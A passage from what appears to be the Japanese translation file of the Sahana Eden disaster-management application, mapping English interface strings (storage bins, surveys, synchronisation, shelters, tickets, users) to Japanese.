'Storage Bin Type added': '物資保管タイプを追加しました',
'Storage Bin Type deleted': 'Storage Binタイプを削除しました',
'Storage Bin Type updated': 'Storage Binタイプを更新しました',
'Storage Bin Type': 'Storage Binタイプ',
'Storage Bin Types': '収納箱のタイプ',
'Storage Bin added': 'Storage Binを追加しました',
'Storage Bin deleted': 'Storage Bin を削除しました',
'Storage Bin updated': 'Storage Bin を更新しました',
'Storage Bin': '物資貯蔵容器',
'Storage Bins': '物資保管場所',
'Storage Location Details': '備蓄地点の詳細',
'Storage Location ID': '備蓄地点ID',
'Storage Location Name': '備蓄地点名称',
'Storage Location added': '備蓄地点を追加しました',
'Storage Location deleted': '備蓄地点を削除しました',
'Storage Location updated': '備蓄地点を更新しました',
'Storage Location': '備蓄地点',
'Storage Locations': '備蓄地点',
'Store spreadsheets in the Eden database': 'Edenのデータベースにスプレッドシートを格納',
'Storeys at and above ground level': '地上階数',
'Storm Force Wind': '暴風',
'Storm Surge': '高潮',
'Stowaway': '密航者',
'Street (continued)': '住所 (続き)',
'Street Address': '住所',
'Street': 'ストリート',
'Strong Wind': '強風',
'Structural Hazards': '構造破壊',
'Structural': '構造的な',
'Sub Category': 'サブカテゴリ',
'Sub-type': 'サブタイプ',
'Subject': '件名',
'Submission successful - please wait': '送信に成功しました。しばらくお待ちください',
'Submission successful - please wait...': '送信に成功しました。しばらくお待ちください',
'Submit New (full form)': '(完全なフォームで)新しく投稿する',
'Submit New (triage)': '新しい (トリアージ) を追加',
'Submit New': '新規登録',
'Submit a request for recovery': '遺体回収要請を作成する',
'Submit new Level 1 assessment (full form)': 'レベル1のアセスメントを投稿する(完全なフォーム)',
'Submit new Level 1 assessment (triage)': '新しいレベル1アセスメント(トリアージ)を追加',
'Submit new Level 2 assessment': '新しいレベル2アセスメントの登録',
'Submit': '送信',
'Subscription Details': '寄付申し込みの詳細',
'Subscription added': '寄付申し込みを追加しました',
'Subscription deleted': '寄付申し込みを削除しました',
'Subscription updated': '寄付申し込みを更新しました',
'Subscriptions': '寄付申し込み',
'Subsistence Cost': '生存コスト',
'Suburb': '郊外',
'Sufficient care/assistance for chronically ill': '慢性疾患罹患者への十分なケア / 介護がある',
'Suggest not changing this field unless you know what you are doing.': 'よくわからない場合は、この項目を変更しないでください。',
'Summary by Administration Level': '管理レベルの概要',
'Summary': '要約',
'Sunday': '日曜',
'Supervisor': '監督者',
'Supplies': '支給品',
'Support Request': '支援要請',
'Support Requests': '支援の要請',
'Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.': '危機管理の専門グループの助言を取り入れることで、救援活動の優先順位を作成しやすくします。',
'Sure you want to delete this object?': 'このオブジェクトを削除してもよろしいですか?',
'Surgery': '外科',
'Survey Answer Details': '調査回答詳細',
'Survey Answer added': '調査の回答を追加しました',
'Survey Answer deleted': '調査の回答を削除しました',
'Survey Answer updated': '調査回答を更新しました',
'Survey Answer': '調査回答',
'Survey Module': '調査モジュール',
'Survey Name': 'Survey 名',
'Survey Question Details': '調査項目の詳細',
'Survey Question Display Name': 'フィードバックの質問の表示名',
'Survey Question added': '調査の質問を追加しました',
'Survey Question deleted': '調査の質問を削除しました',
'Survey Question updated': 'Survey Questionを更新しました',
'Survey Question': '調査の質問',
'Survey Section Details': 'フィードバック項目の詳細',
'Survey Section Display Name': '調査項目の表示名',
'Survey Section added': '調査項目を追加しました',
'Survey Section deleted': 'フィードバック項目を削除しました',
'Survey Section updated': 'サーベイセクションを更新しました',
'Survey Section': '調査項目',
'Survey Series Details': 'Survey Seriesの詳細',
'Survey Series Name': 'フィードバックシリーズ名',
'Survey Series added': '一連の調査を追加しました',
'Survey Series deleted': '一連の調査を削除しました',
'Survey Series updated': '連続調査を更新しました',
'Survey Series': '一連の調査',
'Survey Template Details': '調査テンプレートの詳細',
'Survey Template added': 'Surveyテンプレートを追加しました',
'Survey Template deleted': '調査テンプレートを削除しました',
'Survey Template updated': '調査のテンプレートを更新しました',
'Survey Template': '調査テンプレート',
'Survey Templates': '調査のテンプレート',
'Switch this on to use individual CSS/Javascript files for diagnostics during development.': '開発時にこのスイッチをONにすることで、CSS/Javascriptファイルの診断を行なえます。',
'Symbology': 'シンボル体系',
'Sync Conflicts': 'データ同期中に競合が発生しました',
'Sync History': 'データ同期履歴',
'Sync Now': '今すぐデータ同期',
'Sync Partners are instances or peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) that you want to sync information with. Click on the link on the right to go the page where you can add sync partners, search for sync partners and modify them.': 'データ同期先とは、情報の同期を行うインスタンスやピアのことを指します。(Sahana EdenやSahanaAgasti、Ushahidiなどと同期可能です) 同期先の登録や検索、登録情報の変更を行う際は、リンクをクリックしてページを表示してください。',
'Sync Partners': 'データ同期パートナー',
'Sync Pools': 'プールの同期',
'Sync Schedule': 'データ同期スケジュール',
'Sync Settings': 'データ同期設定',
'Sync process already started on ': 'データ同期プロセスは既に開始しています',
'Synchronisation History': 'データ同期履歴',
'Synchronisation': '同期',
'Synchronization Conflicts': '同期のコンフリクト',
'Synchronization Details': 'データ同期の詳細',
'Synchronization History': 'データ同期履歴',
'Synchronization Peers': 'データ同期先',
'Synchronization Settings': 'データ同期設定',
'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. This page provides you with information about how to use the synchronization features of Sahana Eden': 'データ同期を使用すると、他の端末とデータを共有し、自身のデータを最新の状態に更新することができます。このページには、SahanaEdenにおいてデータ同期を行う方法が記載されています。',
'Synchronization not configured.': 'データ同期が設定されていません',
'Synchronization settings updated': 'データ同期設定を更新しました',
'Synchronization': 'データ同期',
'Syncronisation History': 'データ同期履歴',
'Syncronisation Schedules': 'データ同期スケジュール',
'System allows the General Public to Report Incidents & have these Tracked.': 'システムを使うことで、一般市民によるインシデントの報告、および報告されたインシデントの追跡を行うことができます。',
'System allows the tracking & discovery of Items stored in Locations.': 'システムにより、物資がどこで保持されているかを追跡、明確化することができます。',
'System is a central online repository where all relief organizations, relief workers, government agents and camp sites for displaced personnel can coordinate the supply of aid with their demand. It allows users to allocate the available resources to fulfill the demands effectively and efficiently.': 'このシステムは、支援団体、個々の支援者、政府職員、そして避難所に移動した人々の間で、援助の需要と供給の調整を図るための、オンラインの中央データベースです。このシステムを用いて、利用可能な資源を、需要を満たすように、有効かつ効率的に割り当てることができます。',
'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'この仕組みでは、災害地域の全てのボランティア情報を提供します。ボランティアの活動場所に加え、そこで提供する支援内容も提供します。',
'TMS Layers': 'TMSレイヤ',
'Table name': 'テーブル名',
'Tags': 'タグ',
'Take shelter in place or per <instruction>': 'その場で待避するか、<instruction>に従って避難してください',
'Task Details': 'タスクの詳細',
'Task List': 'タスク一覧',
'Task Status': 'タスクの状況',
'Task added': 'タスクを追加しました',
'Task deleted': 'タスクを削除しました',
'Task status': 'タスク状況',
'Task updated': 'タスクを更新しました',
'Tasks': 'タスク',
'Team Description': 'チーム概要',
'Team Details': 'チームの詳細',
'Team Head': 'チーム代表者',
'Team Id': 'チームID',
'Team Leader': 'チームリーダー',
'Team Member added': 'チームメンバーを追加しました',
'Team Members': 'チームメンバー',
'Team Name': 'チーム名',
'Team Type': 'チームタイプ',
'Team added': 'チームを追加しました',
'Team deleted': 'チームを削除しました',
'Team updated': 'チームを更新しました',
'Team': 'チーム',
'Teams': 'チーム',
'Technical testing only, all recipients disregard': '技術検証のみです。受信者はこのメッセージを無視してください',
'Telecommunications': '通信・情報',
'Telephone': '電話',
'Telephony': '電話',
'Temp folder %s not writable - unable to apply theme!': '一時フォルダ%sが書き込み不可になっています。テーマを適用できません。',
'Template file %s not readable - unable to apply theme!': 'テンプレートファイル %s が読み込み不可になっています。テーマを適用できません。',
'Templates': 'テンプレート',
'Term for the fifth-level within-country administrative division (e.g. a voting or postcode subdivision). This level is not often used.': '国内における第五段階管理部門を示す用語(例: 郵便番号の下位部分)。このレベルは通常使われません。',
'Term for the fourth-level within-country administrative division (e.g. Village, Neighborhood or Precinct).': '国内で第4の行政区域を示す用語 (例えば村、地区)',
'Term for the primary within-country administrative division (e.g. State or Province).': '国内で最大の行政区域を示す用語 (例えば州や都道府県)',
'Term for the secondary within-country administrative division (e.g. District).': '国内で二番目の管理部門の用語 (例: 区)',
'Term for the third-level within-country administrative division (e.g. City or Town).': '国内で三番目の管理部門を示す用語 (例: 市や町)',
'Term for the top-level administrative division (typically Country).': '最上位の統制区域を示す用語 (一般的には国)',
'Territorial Authority': '地方機関',
'Terrorism': 'テロリズム',
'Tertiary Server (Optional)': '三番目のサーバ(オプション)',
'Test Results': 'テスト結果',
'Text Color for Text blocks': 'テキストブロックのテキスト色',
'Text before each Text Field (One per line)': 'テキストフィールドの前のテキスト (一行に一つ)',
'Text in Message': 'メッセージのテキスト',
'Text in Message: ': 'メッセージのテキスト: ',
'Text': 'テキスト',
'Thanks for your assistance': 'ご協力ありがとうございます',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1 == db.table2.field2" results in a SQL JOIN.': '"query"は"db.table1.field1==\'value\'"のような条件です。SQL JOINの"db.table1.field1 == db.table2.field2"結果のようなものです。',
'The Area which this Site is located within.': 'このサイトが含まれる地域',
'The Assessments module allows field workers to send in assessments. 2 different options are provided here currently:': 'アセスメントモジュールは、被災現場で活動する人々による現状の査定報告を記録することができます。現在は、2種類のオプションが提供されています。',
'The Assessments module allows field workers to send in assessments.': 'アセスメントモジュールは、被災現場で活動する人々による現状の査定報告を記録することができます。',
'The Author of this Document (optional)': 'この文書の作成者氏名(オプション)',
'The Building Asssesments module allows building safety to be assessed, e.g. after an Earthquake.': 'ビルアセスメントモジュールではビルの安全性評価を行います (例:地震の後など)',
'The Current Location of the Person/Group, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物/グループの現在地は報告用の概要レベルの情報あるいは地図上の表示のため正確な情報いずれの場合もあります。場所名の数文字を入力すると、登録済みの場所から検索できます。',
'The District for this Report.': 'このレポートが関連する地区。',
'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': '承認依頼が送信されるメールアドレス(通常は個人のメールアドレスではなく、グループのメールアドレス)。この欄が空白の場合、ドメインが一致すれば依頼は自動的に承認されます',
'The Group whose members can edit data in this record.': 'このグループのメンバーは、レコード上のデータを修正することができます。',
'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': '一般ユーザは、インシデント・レポートシステムからインシデントを報告し、その結果を表示させることができます。',
'The Location of this Site, which can be general (for Reporting) or precise (for displaying on a Map).': 'Siteのロケーション、(レポート用で)おおまかな場合と、(地図表示用で)正確な場合とがあります。',
'The Location the Person has come from, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物がやって来たロケーションで、報告のためのだいたいの場所、あるいは地図で表示するための正確な緯度経度です。使用可能なロケーションを検索するには最初の数文字を入力してください',
'The Location the Person is going to, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物が向かう場所は報告用の概要レベルの情報あるいは地図上の表示のため正確な情報いずれの場合もあります。場所名の数文字を入力すると、登録済みの場所から検索できます。',
'The Media Library provides a catalog of digital media.': 'メディア・ライブラリーは、デジタル・メディアの一覧を提供します。',
'The Messaging Module is the main communications hub of the Sahana system. It is used to send alerts and/or messages using SMS & Email to various groups and individuals before, during and after a disaster.': 'メッセージング・モジュールは、SAHANAシステムのコミュニケーション中心となります。災害の前、災害中または災害の後に様々なグループや個人にSMSとeメールで警報やメッセージを送ります。',
'The Office this record is associated with.': 'このレコードに関連するオフィス',
'The Organization Registry keeps track of all the relief organizations working in the disaster region. It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': '団体情報を登録することで、被災地域で活動するすべての団体の活動を追跡します。また、それぞれの地域において、彼らがどこで活動しているかという情報だけでなく、彼らが各地で提供しているプロジェクトの範囲についての情報も提供します。',
'The Organization this record is associated with.': 'このレコードに関連する団体',
'The Organization which is funding this Activity.': 'この支援活動に資金を提供する団体',
'The Person currently filling this Role.': '現在この役割に属している人物',
'The Project Tracking module allows the creation of Activities to meet Gaps in Needs Assessments.': 'プロジェクト追跡モジュールでは、支援活動(アクティビティ)を作成し、必要な物資 / サービスのギャップを満たすことを目的とします。',
'The Rapid Assessments Module stores structured reports done by Professional Organizations.': '被災地の現況アセスメントには、専門団体によって行われたレポートの結果が格納されます。',
'The Request this record is associated with.': 'このレコードに関連する支援要請',
'The Requests Management System is a central online repository where all relief organizations, relief workers, government agents and camp sites for displaced personnel can coordinate the supply of aid with their demand. It allows users to allocate the available resources to fulfill the demands effectively and efficiently.': '支援要請管理システムは、全ての支援団体、救援者、政府職員、および避難所に暮らす避難者たち自身が、要求に応じて援助の供給を調整できる中央のオンラインデータベースです。支援要請管理システムは効果的かつ効率的に要求を満たすことができる利用可能な資源の割り当てを可能にします。',
'The Role this person plays within this Office/Project.': 'オフィス/プロジェクトにおける役割',
'The Role this person plays within this hospital.': '病院内における役割',
'The Role to which this Role reports.': 'この権限の報告先となる権限',
'The Shelter Registry tracks all shelters and stores basic details regarding them. It collaborates with other modules to track people associated with a shelter, the services available etc.': '避難所登録は、避難所を追跡し、それらの詳細を蓄積します。避難所に関連付けられた人、利用可能なサービス等の他のモジュールと協業します。',
'The Shelter this Request is from (optional).': '要請を行った避難所(オプション)',
'The Shelter this person is checking into.': 'この人物がチェックインした避難所',
'The URL for the GetCapabilities of a WMS Service whose layers you want accessible via the Map.': '地図を用いてレイヤを利用できる WMS サービスの GetCapabilities の URL。',
'The URL of your web gateway without the post parameters': 'ポストパラメータを指定しないWebゲートウェイのURL',
'The URL to access the service.': 'サービスにアクセスするためのURL',
'The Unique Identifier (UUID) as assigned to this facility by the government.': '政府がこの施設に割り当てた汎用一意識別子(UUID)です。',
'The area is ': '面積は ',
'The attribute within the KML which is used for the title of popups.': 'このKML属性はポップアップのタイトルに使われます。',
'The attribute(s) within the KML which are used for the body of popups. (Use a space between attributes)': 'KMLで定義されている属性はポップアップの本文に使用されます。(各属性ごとに半角スペースで分割して記載してください)',
'The body height (crown to heel) in cm.': '頭頂からかかとまでの身長(単位はcm)',
'The category of the Item.': 'この救援物資のカテゴリです',
'The contact person for this organization.': '団体の代表窓口',
'The country the person usually lives in.': 'この人物が普段の生活を営む国',
'The default policy for data import from this peer.': 'このデータ同期先からデータをインポートする際のデフォルト設定。',
'The descriptive name of the peer.': 'データ同期先のわかりやすい名称',
'The duplicate record will be deleted': '重複したレコードは削除されます',
'The entered unit links to this unit. For e.g. if you are entering m for meter then choose kilometer(if it exists) and enter the value 0.001 as multiplicator.': '入力した単位をこのユニットにリンクします。例えば、mをメートルとする場合、(存在するなら) kilometer を選択して、乗数に値 0.001 を入力します。',
'The first or only name of the person (mandatory).': '人物の苗字(必須)。 外国籍の方等については避難所等での管理上の主たる表記/順に従ってください。',
'The following modules are available': '利用可能なモジュールは以下のとおりです。',
'The hospital this record is associated with.': 'このレコードに関連のある病院。',
'The item is designated to be sent for specific project, population, village or other earmarking of the donation such as a Grant Code.': 'この物資は、特定のプロジェクト、住民、村落、あるいは交付コードなどで指定された寄付の用途に向けて送付されるよう指定されています。',
'The language to use for notifications.': '通知に使用する言語',
'The language you wish the site to be displayed in.': 'このサイトを表示するための言語',
'The last known location of the missing person before disappearance.': '行方不明者が最後に目撃された場所',
'The length is ': '長さは',
'The list of Brands are maintained by the Administrators.': '銘柄一覧の整備は、管理者によって可能です',
'The list of Item categories are maintained by the Administrators.': '供給物資カテゴリの一覧は、管理者によってメンテナンスされています。',
'The name to be used when calling for or directly addressing the person (optional).': '電話をかける際など、直接連絡をとりたい場合に使われる名前(オプション)',
'The next screen will allow you to detail the number of people here & their needs.': '次の画面では、人数および必要な物資/サービスの詳細を確認できます。',
'The next screen will allow you to enter a detailed list of items and quantities, if appropriate...': '次のスクリーンで、項目の詳細なリストと量を入力できる場合があります。',
'The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item': '元の物資一つと同じだけの、代替品の測定単位での数量',
'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': '表示している地図の周辺タイルをダウンロードする数。0は最初のページの読み込みがより早い事を意味し、数字を大きくすると視点をパンした際に表示がより早くなります。',
'The person at the location who is reporting this incident (optional)': '現地からこのインシデントを報告した人物(オプション)',
'The person reporting about the missing person.': '行方不明者情報の提供者。',
'The person reporting the missing person.': '行方不明者を報告した人',
'The post variable containing the phone number': '電話番号を含む post 変数',
'The post variable on the URL used for sending messages': 'メッセージ送信に使用するURLのPOST変数',
'The post variables other than the ones containing the message and the phone number': 'メッセージや電話番号以外を含むpost変数',
'The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows': 'モデムが接続されているシリアルポート - Linuxでは /dev/ttyUSB0 等、Windowsでは com1, com2 等',
'The server did not receive a timely response from another server that it was accessing to fill the request by the browser.': '要求を満たすためアクセスしていた別のサーバーからの応答がありませんでした。',
'The server received an incorrect response from another server that it was accessing to fill the request by the browser.': '要求を満たすためアクセスしていた別のサーバーから不正な応答が返ってきました。',
'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'シンプルポリシーでは、匿名ユーザーによるデータの閲覧、および、登録ユーザーによる編集が許可されます。完全版ポリシーでは、個々のテーブルやレコードに対して管理権限を設定することができます。詳細はmodels/zzz.pyを参照してください。',
'The subject event no longer poses a threat or concern and any follow on action is described in <instruction>': '対象のイベントはもはや脅威や懸念をもたらしません。今後のアクションは<instruction>に記述されています。',
'The time difference between UTC and your timezone, specify as +HHMM for eastern or -HHMM for western timezones.': 'あなたのタイムゾーンとUTCとの差を、東では+HHMMで、西では-HHMMで指定してください',
'The title of the WMS Browser panel in the Tools panel.': '[ツール]パネルのWMS Browserパネルのタイトル',
'The token associated with this application on': 'このアプリケーションが関連づけられているトークン',
'The unique identifier of the peer. Leave blank if the peer is no Sahana Eden instance, it will be auto-assigned in that case.': '一意のデータ同期先識別子です。データ同期先がSahana Edenシステムではない場合は、空白にしておくことで自動的に割り当てが行われます。',
'The unique identifier which identifies this instance to other instances.': 'このインスタンスを他のインスタンスと区別するための固有識別子',
'The way in which an item is normally distributed': '物資が配給される際の通常経路',
'The weight in kg.': '重量(単位:kg)',
'The': ' ',
'Theme Details': 'テーマの詳細',
'Theme added': 'テーマを追加しました',
'Theme deleted': 'テーマを削除しました',
'Theme updated': 'テーマを更新しました',
'Theme': 'テーマ',
'Themes': 'テーマ',
'There are errors': 'エラーが発生しました',
'There are multiple records at this location': 'このロケーションに複数のレコードが存在します',
'There are not sufficient items in the Inventory to send this shipment': 'この輸送を開始するために十分な量の物資が備蓄されていません',
'There is no address for this person yet. Add new address.': 'この人物の住所がまだありません。新しい住所を入力してください',
'There was a problem, sorry, please try again later.': '問題が発生しています。すみませんが、時間を置いてからやり直してください。',
'These are settings for Inbound Mail.': '電子メール受信箱の設定です',
'These are the Incident Categories visible to normal End-Users': '普通のユーザーが見ることができるインシデント一覧です',
'These are the default settings for all users. To change settings just for you, click ': 'これらは、全てのユーザーのデフォルト設定です。個人用の設定を変更するには、以下をクリックしてください。',
'These need to be added in Decimal Degrees.': 'これらは、十進角で追加する必要があります。',
'They': 'それら',
'This Group has no Members yet': 'メンバはまだ登録されていません',
'This Team has no Members yet': 'メンバはまだ登録されていません',
'This appears to be a duplicate of ': 'これは、以下のものと重複しているようです。',
'This can either be the postal address or a simpler description (such as `Next to the Fuel Station`).': '住所か、あるいは簡単な記述(ガソリンスタンドの隣、など)を記載しています。',
'This email address is already in use': 'このメールアドレスは使用されています',
'This file already exists on the server as': 'このファイルは別の名前でサーバに既に存在しています : ',
'This form allows the administrator to remove a duplicate location.': '管理者はこのフォームを使うことで、重複したロケーションデータを削除できます。',
'This is the way to transfer data between machines as it maintains referential integrity.': '参照整合性を保ちつつ、端末間でデータを転送する方法が記載されています。',
'This is the way to transfer data between machines as it maintains referential integrity...duplicate data should be removed manually 1st!': '参照整合性を保ちつつ、端末間でデータを転送する方法が記載されています。...重複したデータは最初に手動で削除する必要があります。',
'This might be due to a temporary overloading or maintenance of the server.': 'サーバーが一時的に過負荷状態になっているか、あるいはメンテナンスを行っています。',
'This page shows you logs of past syncs. Click on the link below to go to this page.': '過去に行ったデータ同期履歴を表示します。以下のリンクをクリックしてください。',
'This screen allows you to upload a collection of photos to the server.': 'この画面では、複数の画像をサーバーにアップロードすることができます。',
'This shipment has already been received.': '輸送が開始され、物資が受領されました',
'This shipment has already been sent.': '輸送が開始され、送付されました',
'This shipment has not been received - it has NOT been canceled because it can still be edited.': 'この輸送は受領されていません。 - まだ編集可能であり、キャンセルされてはいません',
'This shipment has not been sent - it has NOT been canceled because it can still be edited.': '輸送はまだ開始されていませんが、キャンセルされてはいません。編集可能です。',
'This shipment will be confirmed as received.': 'この輸送された物資は、受信済み扱いになります',
'This value adds a small mount of distance outside the points. Without this, the outermost points would be on the bounding box, and might not be visible.': 'この値はその地点の外側までの距離の小さなマウントを追加します。この値が無い場合は、一番外側の地点が境界ボックスになり、表示されない可能性があります。',
'This value gives a minimum width and height in degrees for the region shown. Without this, a map showing a single point would not show any extent around that point. After the map is displayed, it can be zoomed as desired.': 'この値はこの地域を表示する時に使う最小の幅と高さを示します。この値がない場合、ある単一の地点を表示するときにその周辺の範囲は表示されません。地図が表示された後では、好きな大きさに拡大・縮小できます。',
'Thunderstorm': '雷雨',
'Thursday': '木曜日',
'Ticket Details': 'チケットの詳細',
'Ticket ID': 'チケットID',
'Ticket added': 'チケットを追加しました',
'Ticket deleted': 'チケットを削除しました',
'Ticket updated': 'チケットを更新しました',
'Ticket': 'チケット',
'Ticketing Module': 'チケット発行モジュール',
'Tickets': 'チケット',
'Tilt-up concrete': 'ティルトアップ式コンクリート',
'Timber frame': '木造',
'Time needed to collect water': '水の確保に必要な時間',
'Time of Request': '要求発生時刻',
'Timeline Report': 'タイムラインレポート',
'Timeline': 'タイムライン',
'Timestamp': 'タイムスタンプ',
'Title': 'タイトル',
'To Location': '送付先ロケーション',
'To Organization': '送付先団体',
'To Person': '送付先人物情報',
'To Site': '送付先サイト',
'To begin the sync process, click the button on the right => ': '右のボタンを押すと、データ同期が開始されます。',
'To begin the sync process, click this button => ': 'このボタンを押すと、データ同期が開始されます。=>',
'To create a personal map configuration, click ': '個人用の地図設定を作成するにはクリックしてください',
'To delete': '削除する側',
'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in models/000_config.py': 'OpenStreetMapを編集する際は、models/000_config.pyで定義されている設定を編集してください',
'To submit a new job, use the': 'jobを新規送信するには、以下を使用してください。',
'To variable': '変数に',
'To': ' ',
'Tools': 'ツール',
'Tornado': '竜巻',
'Total # of Beneficiaries Reached ': '支援が到達した受益者の合計数 ',
'Total # of Target Beneficiaries': '受益対象者の合計人数',
'Total # of households of site visited': '訪問した世帯数',
'Total Beds': '合計ベッド数',
'Total Beneficiaries': '受益者の総数',
'Total Cost per Megabyte': 'メガバイト毎の合計費用',
'Total Cost per Minute': '一分毎の合計費用',
'Total Households': '総世帯数',
'Total Monthly Cost': '月額総計',
'Total Monthly Cost: ': '月毎の費用の合計: ',
'Total Monthly': '月ごとの合計',
'Total One-time Costs': '1回毎の費用総計',
'Total Persons': '合計者数',
'Total Recurring Costs': '経常費用総計',
'Total Unit Cost': '単価合計',
'Total Unit Cost: ': '単価合計: ',
'Total Units': '総数',
'Total gross floor area (square meters)': '延面積(平方メートル)',
'Total number of beds in this hospital. Automatically updated from daily reports.': 'この病院のベッド数総計。日時レポートにより、自動的に更新されます。',
'Total number of houses in the area': 'この地域の家屋総数',
'Total number of schools in affected area': '被災地内の学校総数',
'Total population of site visited': '訪問地域の総人口数',
'Total': '合計数',
'Totals for Budget:': '予算の合計:',
'Totals for Bundle:': 'Bundleの合計:',
'Totals for Kit:': 'Kitの合計:',
'Tourist Group': '旅行者グループ',
'Town': '町',
'Traces internally displaced people (IDPs) and their needs': '国内の避難している人(IDP)と彼らの必要としている物資/サービスの追跡',
'Tracing': '履歴の追跡',
'Track Details': '追跡情報の詳細',
'Track deleted': '追跡情報を削除しました',
'Track updated': '追跡情報を更新しました',
'Track uploaded': '追跡情報をアップデートしました',
'Track': '追跡情報',
'Tracking of Projects, Activities and Tasks': 'プロジェクトや支援活動、タスクの追跡',
'Tracking of basic information on the location, facilities and size of the Shelters': '避難所の基本情報(場所、施設、規模等)を追跡',
'Tracks requests for aid and matches them against donors who have pledged aid': '支援要請を管理し、救援物資の提供者とマッチングします。',
'Tracks the location, distibution, capacity and breakdown of victims in Shelters': '避難所のロケーション、配置、収容能力と被災者の状態を追跡します。',
'Tracks': 'トラック',
'Traffic Report': 'トラフィックレポート',
'Transfer': '輸送',
'Transit Status': '輸送状態',
'Transit': '移動中の立ち寄り',
'Transit. Status': '輸送状態',
'Transition Effect': '推移への影響',
'Transparent?': '透明ですか?',
'Transportation assistance, Rank': '移動 / 輸送支援、ランク',
'Trauma Center': '心的外傷センター',
'Travel Cost': '移動費',
'Tree': '樹木',
'Tropical Storm': '熱帯低気圧',
'Tropo Messaging Token': 'Tropo メッセージのトークン',
'Tropo Settings': 'Tropo 設定',
'Tropo Voice Token': 'Tropo 音声トークン',
'Tropo settings updated': 'Tropo 設定を更新しました',
'Truck': 'トラック',
'Try checking the URL for errors, maybe it was mistyped.': '入力したURLに間違いがないか確認してください。',
'Try hitting refresh/reload button or trying the URL from the address bar again.': 'ページの再読み込みを行うか、あるいはアドレスバーに直接URLを入力してみてください。',
'Try refreshing the page or hitting the back button on your browser.': 'ページを再読込するか、ブラウザの[戻る]ボタンを押してください。',
'Tsunami': '津波',
'Tuesday': '火曜日',
'Twitter ID or #hashtag': 'Twitter ID あるいは #ハッシュタグ',
'Twitter Settings': 'Twitter設定',
'Type of Construction': '建物の種類',
'Type of cause': '原因のタイプ',
'Type of latrines': 'トイレの種類',
'Type of place for defecation': '排泄用地の種類',
'Type of water source before the disaster': '災害発生前の水の確保方法',
'Type': 'タイプ',
'Types of health services available': '利用可能な健康サービスの種別',
'Types of water storage containers available': '利用可能な水貯蔵容器の種別',
'UID': 'ユニークID',
'UN': '国連',
'UTC Offset': 'UTC(世界標準時刻)との差',
'Unable to parse CSV file!': 'CSVファイルをパースできません。',
'Understaffed': '人員不足',
'Unidentified': '詳細不明',
'Unit Bed Capacity': 'ベッド収容数',
'Unit Cost': '単価',
'Unit Details': '単位の詳細',
'Unit Name': '単位名',
'Unit Set': '単位の設定',
'Unit Short Code for e.g. m for meter.': '単位の略称、例えばメートルはmと表記。',
'Unit added': '単位を追加しました',
'Unit deleted': '単位を削除しました',
'Unit of Measure': '1個口の内訳',
'Unit updated': '単位を更新しました',
'Unit': '単位',
'Units of Measure': '測定単位',
'Units': '単位',
'Unknown Peer': '登録に無いデータ同期先',
'Unknown type of facility': '施設規模不明',
'Unknown': '不明',
'Unreinforced masonry': '補強されていない石造建築物',
'Unresolved Conflicts': '未解決のデータ競合',
'Unsafe': '危険な',
'Unselect to disable the modem': 'モデムを無効化するにはチェックを外す',
'Unsent': '未送信',
'Unsupported data format!': 'サポートされていないデータフォーマットです。',
'Unsupported method!': 'サポートされていないメソッドです。',
'Unsupported method': 'サポートされていないメソッドです',
'Update Activity Report': '支援活動レポートの更新',
'Update Cholera Treatment Capability Information': 'コレラ対策能力情報を更新',
'Update Import Job': 'Import Jobの更新',
'Update Request': '支援要請を更新',
'Update Service Profile': 'サービスプロファイルの更新',
'Update Task Status': 'タスク状況の更新',
'Update Unit': '単位の更新',
'Update if Master': 'マスターサイトなら更新する',
'Update if Newer': '新しいものがあれば更新する',
'Update your current ordered list': '現在の順序付きリストの更新',
'Update': '更新',
'Upload Photos': '写真のアップロード',
'Upload Spreadsheet': 'スプレッドシートのアップロード',
'Upload Track': '追跡情報のアップロード',
'Upload a Spreadsheet': 'スプレッドシートをアップロード',
'Upload an image file (bmp, gif, jpeg or png), max. 300x300 pixels!': '画像ファイルをアップロード(bmp,gif,jpeg,png) 最大300x300ピクセル',
'Upload an image file here.': '画像ファイルをここにアップロードしてください',
'Upload an image, such as a photo': '写真などのイメージをアップロードしてください',
'Upload': 'アップロード',
'Urban Fire': '都市火災',
'Urban area': '市街地',
'Urdu': 'ウルドゥー語',
'Urgent': '緊急',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': '複雑なクエリを構築するには、ANDは (...)&(...) を、ORは (...)|(...) を、NOTは ~(...) を使用してください。',
'Use default': 'デフォルト値を使用',
'Use these links to download data that is currently in the database.': 'これらのリンクを使用して、現在データベースにあるデータをダウンロードします。',
'Use this space to add a description about the Bin Type.': 'Bin Typeに関する説明は、このスペースに記載してください。',
'Use this space to add a description about the site location.': 'このスペースを使って、サイトの位置の説明を追加してください。',
'Use this space to add a description about the warehouse/site.': '倉庫/Siteに関する説明は、このスペースに記載してください。',
'Use this space to add additional comments and notes about the Site/Warehouse.': 'Site/倉庫に関する追加情報を記載するには、このスペースを使用してください。',
'Used to import data from spreadsheets into the database': 'スプレッドシートからデータベースにデータをインポートするために使われます',
'User %(first_name)s %(last_name)s Approved': '%(first_name)s %(last_name)s のユーザー登録が承認されました',
'User %(id)s Logged-in': 'ユーザー %(id)s がログインしています',
'User %(id)s Logged-out': 'ユーザー %(id)s がログアウトしました',
'User %(id)s Profile updated': 'ユーザ %(id)s のプロファイルを更新しました',
'User %(id)s Registered': 'ユーザー%(id)sを登録しました',
'User Account has been Disabled': 'ユーザアカウントが無効になっています',
'User Details': 'ユーザーの詳細',
'User ID': 'ユーザーID',
'User Management': 'ユーザー管理',
